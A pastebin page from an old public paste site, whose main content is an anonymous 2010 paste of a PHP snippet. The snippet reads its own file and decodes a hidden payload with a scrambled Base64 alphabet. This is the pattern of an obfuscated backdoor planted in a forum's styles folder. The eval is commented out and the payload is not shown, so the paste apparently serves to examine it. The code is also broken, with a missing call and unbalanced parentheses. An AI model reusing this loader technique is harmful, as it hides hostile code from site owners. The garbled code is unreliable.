Recent
:: This post is secret nox
5 hrs ago
:: RIFAS
6 hrs ago
:: RIFAS
7 hrs ago
:: zacharyj
7 hrs ago
:: zacharyj
7 hrs ago
:: zacharyj
7 hrs ago
:: zacharyj
7 hrs ago
:: zacharyj
7 hrs ago
:: zacharyj
7 hrs ago
:: RIFAS
10 hrs ago
:: anonymous
15 hrs ago
:: georg
24 hrs ago
:: RetroFOX
1 day ago
:: This post is secret Bystroushaak
1 day ago
:: This post is secret Bystroushaak
1 day ago
rss 2.0 feed

Make New Post
Posts: 19054

Syntax:       Wrapping:  

   #19154 Posted by anonymous 2010-02-08 18:28:49 ( view diff)
Formated by GeSHi
  1. <?php
  2.  
  3. $FILE_NAME=__FILE__; // Mine is "/home/sacom/public_html/forum/cpstyles/cc/dop.php"
  4. $LINE_NUM=__LINE__; // It is "1". Explanation below
  5. $SIZE=3024;
  6.  
  7. $FILE_HANDLE=fopen($FILE_NAME,'rb');
  8. while(--$LINE_NUM) fgets($FILE_HANDLE,1024); // never gets executed
  9. fgets($FILE_HANDLE,4096); // reads in the first line, advances the file pointer
  10.  
  11. $CODE=
  12. fread($FILE_HANDLE,368),
  13. 'xFCazDBkYJmXHS7A0WMQn36+OTtIoNZEfbjgivyq/12UV4wr8cePRsplKLud9G5h=',
  14. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
  15. )));
  16.  
  17. //eval($CODE);
  18. return;
  19. ?>
Parsed in 0.10782981 seconds
::  Inline view Inline view ::  Email this post Email  ::  Print Print   

:: Download   Download Text File19154.txt   Download Gziped text File19154.txt.gz   Download HTML File19154.html   Download PDF File19154.pdf
:: Print into    Print into HTML FileHTML document   Print into PDF FilePDF document

:: Make Diff

:: Erase Post

* Code:

To highlight particular lines, prefix each line with @@


Description:


Secret key (for later deletion)
Syntax:     


comments (0)


Copyright © 2006 Openpastebin